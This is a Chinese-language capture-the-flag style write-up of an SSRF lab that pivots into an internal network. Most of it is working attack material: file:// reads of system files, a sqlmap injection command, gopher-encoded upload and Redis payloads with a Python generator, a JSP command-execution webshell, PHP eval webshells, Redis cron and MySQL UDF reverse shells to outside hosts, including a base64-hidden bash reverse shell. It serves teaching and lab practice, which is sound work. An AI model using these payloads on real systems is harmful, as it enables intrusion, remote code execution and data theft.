靶场网络拓扑如下
172.172.0.10 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网,此时攻击者通过公网可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。
大部分源码采用自国光师傅的项目,修改了一两个靶机的内容
https://github.com/sqlsec/ssrf-vuls
0x01 判断 SSRF并获取信息
SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。
下面这个功能点是获取网站快照
正常业务情况是请求网站然后响应内容,但是没做好过滤可以使用其他协议,配合 file 协议来读取本地的文件信息,首先尝试使用 file 协议来读取 /etc/passwd 文件试试看:
file:///etc/passwd
然后Linux的话可以通过读取/etc/hosts来获取当前主机的ip
file:///etc/hosts
得到当前的主机ip为172.172.0.10 权限高的情况下还可以尝试读取 /proc/net/arp 或者 /etc/network/interfaces 来判断当前机器的网络情况
SSRF 常配合 DICT 协议探测内网端口开放情况,但不是所有的端口都可以被探测,一般只能探测出一些带 TCP 回显的端口
burp爆破模块对ip c段跟端口进行选择然后攻击模式选择Cluster bomb
第一个位置选择1到255也就是一个c段
第二个是要探测的端口
得到的端口开放信息
通过爆破可以得到端口的开放情况(开放的可能更多,上帝视角列出能打的):
172.172.0.15 6379172.172.0.2 6379 172.172.0.18 3306172.172.0.59 80,3306172.172.0.25 80172.172.0.50 80172.172.0.10 80
通过ssrf先请求一下发现了一个首页显示Hello CodeExec
对这个进行SSRF目录扫描
然后添加目录字典
通过长度可以可以看出来存在着 phpinfo.php 和 shell.php:
访问一下shell.php一个简单的命令执行
直接使用 SSRF 的 HTTP 协议来发起 GET 请求,直接给 cmd 参数传入命令值,来命令直接执行:
查看一下这台的hosts文件
请求页面发现是一个查询的功能点
通过查看html表单可以发现是通过get传给当前文件的参数是username
查询一下admin
加个单引号发现报错了
存在报错我们直接构造报错注入payload
172.172.0.59?username=admin'-updatexml(1,concat(0x7e,user()),1)-'
使用sqlmap
sqlmap -u "http://10.68.1.51/" --data "url=" --prefix "172.172.0.59?username=admin'" --dbms mysql -p url --tech E -v 3 --level 3 --tamper space2comment -D "user" --dump
成功跑出注入
发现是一个头像上传的功能点
查看表单可以看到上传到当前文件,文件名是file
上传是通过 POST ,我们无法使用使用 SSRF 漏洞通过 HTTP 协议来传递 POST 数据,这种情况下一般就得利用 gopher 协议来发起对内网应用的 POST 请求了,gopher 的基本请求格式如下:
gopher://IP:port/_{TCP/IP数据流}
gopher 协议是一个古老且强大的协议,从请求格式可以看出来,可以传递最底层的 TCP 数据流,因为 HTTP 协议也是属于 TCP 数据层的,所以通过 gopher 协议传递 HTTP 的 POST 请求也是轻而易举的。
首先来抓取正常情况下 POST 请求的数据包,删除掉 HTTP 请求的这一行如果不删除的话,打出的 SSRF 请求会乱码,因为被两次 gzip 编码了。
Accept-Encoding: gzip, deflate
接着在 Burpsuite 中将本 POST 数据包进行两次 URL 编码:
两次 URL 编码后的数据就最终的 TCP 数据流,最终 SSRF 完整的攻击请求的 POST 数据包如下:
gopher://172.172.0.25:80/_{url编码两次的数据包}
上传成功
请求php文件成功
跟上面一样只是发送的包是put的,准备一个jsp一句话
<%
String command = request.getParameter("cmd"); if(command != null)
{
java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1)
{ out.println(new String(b));
} out.print("</pre>");
} else { out.print("format: xxx.jsp?cmd=Command");
}
%>
准备攻击数据包,将个 POST 请求二次 URL 编码
通过 SSRF 发起这个 POST 请求
接着通过 SSRF 发起对 mo60.jsp 的 HTTP 请求,成功执行了id 的命令:
系统没有 Web 服务(无法写 Shell),无 SSH 公私钥认证(无法写公钥),所以这里攻击思路只能是使用定时任务来进行攻击了。常规的攻击思路的主要命令如下:
# 清空 keyflushall
# 设置要操作的路径为定时任务目录config set dir /var/spool/cron/
# 设置定时任务角色为 rootconfig set dbfilename root
# 设置定时任务内容set x "n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1n"
# 保存操作save
未授权的情况下可以使用 dict 或者 gopher 协议来进行攻击,因为 gopher 协议构造比较繁琐,所以使用 DICT 协议来攻击
dict://x.x.x.x:6379/<Redis 命令>
成功执行info命令
用 dict 协议来创建定时任务来反弹 Shell:
# 清空 keydict://172.172.0.2:6379/flushall
# 设置要操作的路径为定时任务目录dict://172.172.0.2:6379/config set dir /var/spool/cron/
# 在定时任务目录下创建 root 的定时任务文件dict://172.172.0.2:6379/config set dbfilename root
# 写入 Bash 反弹 shell 的 payloaddict://172.172.0.2:6379/set x "n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1n"
# 保存上述操作dict://172.172.0.2:6379/save
成功反弹回来shell
有密码验证,无法直接未授权执行命令:
除了 6379 端口还开放了 80 端口,是一个经典的 LFI 本地文件包含,可以利用此来读取本地的文件内容:
因为 Redis 密码记录在 redis.conf 配置文件中,结合这个文件包含漏洞点,那么这时来尝试借助文件包含漏洞来读取 redis 的配置文件信息,Redis 常见的配置文件路径如下,也有是通过了其他方法拿到了密码比如Spring boot heapdump
/etc/redis.conf
/etc/redis/redis.conf
/usr/local/redis/etc/redis.conf
/opt/redis/ect/redis.conf
成功读取到 /etc/redis.conf 配置文件,直接搜索 requirepass 关键词来定位寻找密码:
有密码可以使用dicty验证一下是否正确,但是因为 dict 不支持多行命令的原因,这样就导致认证后的参数无法执行
dict://172.172.0.15:6379/auth [email protected]
gopher 协议因为需要原生数据包,所以我们需要抓取到 Redis 的请求数据包,在本地安装Redis,用root身份启动Redis-server,利用socat 做端口转发并抓取Redis-cli 和Redis-server通信的数据。
socat -v tcp-listen:5201,fork tcp-connect:localhost:6379 #端口转发并抓取数据
此时使用 redis-cli 连接本地的 5201 端口:
redis-cli -h 127.0.0.1 -p 5201
服务器接着会把 5201 端口的流量接受并转发给服务器的 6379 端口,然后认证后进行往网站目录下写入 shell 的操作:
# 认证 redis127.0.0.1:5201> auth [email protected]# 清空 key127.0.0.1:5201> flushall
# 设置要操作的路径为网站根目录127.0.0.1:5201> config set dir /var/www/html
# 在网站目录下创建 shell.php 文件127.0.0.1:5201> config set dbfilename shell.php
# 设置 shell.php 的内容127.0.0.1:5201> set x "n<?php eval($_GET[1]);?>n"
# 保存上述操作127.0.0.1:5201> save
与此同时我们还可以看到详细的数据包情况,下面来记录一下关键的流量情况:
接下来整理出关键的请求数据包如下:
*2r$4r
authr$8rP@ssw0rdr*1r$8r
flushallr*4r$6r
configr$3rsetr$3r
dirr$13r/var/www/htmlr*4r$6r
configr$3rsetr$10r
dbfilenamer$9r
shell.phpr*3r$3rsetr$1r
xr$25r <?php eval($_GET[1]);?>
r*1r$4r
saver
可以看到每行都是以 r 结尾的,但是 Redis 的协议是以 CRLF (rn) 结尾,所以转换的时候需要把 r 转换为 rn,这里使用七友师傅编写的python脚本
import urllib.parseprotocol = "gopher://"ip = "127.0.0.1"port = "6788"shell = "nn<?php phpinfo();?>nn"filename = "mo60.php"path = "/var/www/html"passwd = "[email protected]"cmd = ["flushall", "set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path), "config set dbfilename {}".format(filename), "save", "quit"
]if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"def redis_format(arr):
CRLF = "rn"
redis_arr = arr.split(" ")
cmd = ""
cmd += "*" + str(len(redis_arr)) for x in redis_arr:
cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
cmd += CRLF return cmdif __name__=="__main__": for x in cmd:
payload += urllib.parse.quote(redis_format(x)) # print(payload)
print(urllib.parse.quote(payload))
发送返回ok
发送的数据如下
url=gopher://172.172.0.15:6379/_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25248%250D%250AP%2540ssw0rd%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252422%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Amo60.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A
尝试访问,成功
也可以通过计划任务反弹shell
成功接收到
MySQL 需要密码认证时,服务器先发送 salt 然后客户端使用 salt 加密密码然后验证;但是当无需密码认证时直接发送 TCP/IP 数据包即可。所以这种情况下是可以直接利用 SSRF 漏洞攻击 MySQL 的。因为使用 gopher 协议进行攻击需要原始的 MySQL 请求的 TCP 数据包,所以还是和攻击 Redis 应用一样,这里我们使用 tcpdump 来监听抓取 3306 的认证的原始数据包:
# lo 回环接口网卡 -w 报错 pcapng 数据包tcpdump -i lo port 3306 -w mysql.pcapng
然后本地使用 MySQL 来执行一些测试命令:
[[email protected]]# mysql -uroot -h127.0.0.1 -e "select * from flag.test";
+----+----------------------------------------+| id | flag |
+----+----------------------------------------+| 1 | flag{71a5d5e6b2b9a3da3dc0a85851d50316} |
+----+----------------------------------------+
Wireshark 打开 mysql.pcapng 数据包,追踪 TCP 流 然后过滤出发给 3306 的数据然后过滤出客户端发送到MySQL服务器的数据包,将显示格式调整为原始数据即可:
然后使用如下的 Python3 脚本将数据转化为 url 编码:
import sysdef results(s):
a=[s[i:i+2] for i in range(0,len(s),2)] return "curl gopher://127.0.0.1:3306/_%"+"%".join(a)s="3c00000185a20f0000000001210000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f726400210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d69742031180000000373656c656374202a2066726f6d20666c61672e746573740100000001"print(results(s))
放入到 BP 中请求的话记得需要二次 URL 编码,成功查询到flag
使用脚本
https://github.com/tarunkant/Gopherus
来生成查看插件目录的exp
show variables like '%plugin%'
放入到 BP 中请求的话记得需要二次 URL 编码,可以直接获取到MySQL 的插件目录为:/usr/lib/mysql/plugin/
使用国光师傅的网站https://www.sqlsec.com/udf/
然后用脚本生成上方语句的payload,写入udf文件,,这里的操作我使用脚本没有完成功要使用tcpdump 监听到的原始数据后,转换 gopher 协议,BP 二次编码请求一下
创建自定义函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
最后通过创建的自定义函数并执行系统命令将 shell 弹出来,原生命令如下:
select sys_eval('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xNjYvNTU1NSAwPiYx|base64 -d|bash -i');
https://www.cnblogs.com/aninock/p/15663953.html https://www.sqlsec.com/2021/05/ssrf.html
作者:Jun
文章来源:blog.mo60.cn
如有侵权,请联系删除
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/191048.html